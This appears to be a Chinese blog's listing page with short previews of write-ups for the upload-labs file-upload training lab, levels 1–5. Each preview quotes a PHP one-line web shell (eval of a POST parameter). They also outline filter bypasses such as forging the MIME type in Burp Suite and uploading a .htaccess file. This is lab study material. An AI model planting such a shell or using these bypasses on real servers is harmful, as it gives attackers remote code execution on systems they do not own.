![](https://img-blog.csdnimg.cn/20210705143646523.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
1.upload-labs
upload-labs
qwsn
努力努力再努力
展开
-
5.upload-labs—Pass05
一、Pass051、上传一个shell.phpshell.php内容为:<?php @eval($_POST['123']);?>//结果如下图所示,提示我们此文件不允许上传2、扩展名黑名单绕过方法:①、上传,shell.php.jpg//尝试是否存在apache的解析漏洞//结果,不能解析②、上传.htaccess//尝试,是否被过滤//结果,被过滤③、打开...原创 2020-03-13 18:51:23 · 2963 阅读 · 2 评论 -
3/4.upload-labs—Pass03和Pass04
一、Pass-03/Pass-041、上传一个shell.phpshell.php内容为:<?php @eval($_POST['123']);?>结果,提示不允许上传.asp .aspx .php .jsp后缀的文件2、黑名单未限制.htaccess的情况:①、上传.htaccess文件文件内容为:<FilesMatch "qwsn">SetHan...原创 2020-03-13 18:38:13 · 1272 阅读 · 0 评论 -
2.upload-labs—Pass02
一、Pass-021、上传shell.phpshell.php内容为:<?php @eval($_POST['123']);?>提示,文件类型不正确,如下图所示:2、打开代理,启动BP,拦截上传shell.php的请求包,修改文件类型为:image/jpeg或者image/png或者image/gif①.修改前:②.修改后:③.点击放通forward,即可上传成功...原创 2020-03-13 18:20:59 · 1857 阅读 · 0 评论 -
1.upload-labs—Pass01
一、Pass-011、上传一个shell.phpshell.php内容为:<?php @eval($_POST['123']);?>//结果如下图所示,提示我们文件后缀不正确,只允许后缀名为:.jpg .png .gif的文件被上传2、浏览器开启代理,打开BP,我们再次尝试上传shell.php结果如下图所示:P没有收到拦截的请求包,依旧提示不允许上传//这就说...原创 2020-03-13 18:10:32 · 1815 阅读 · 0 评论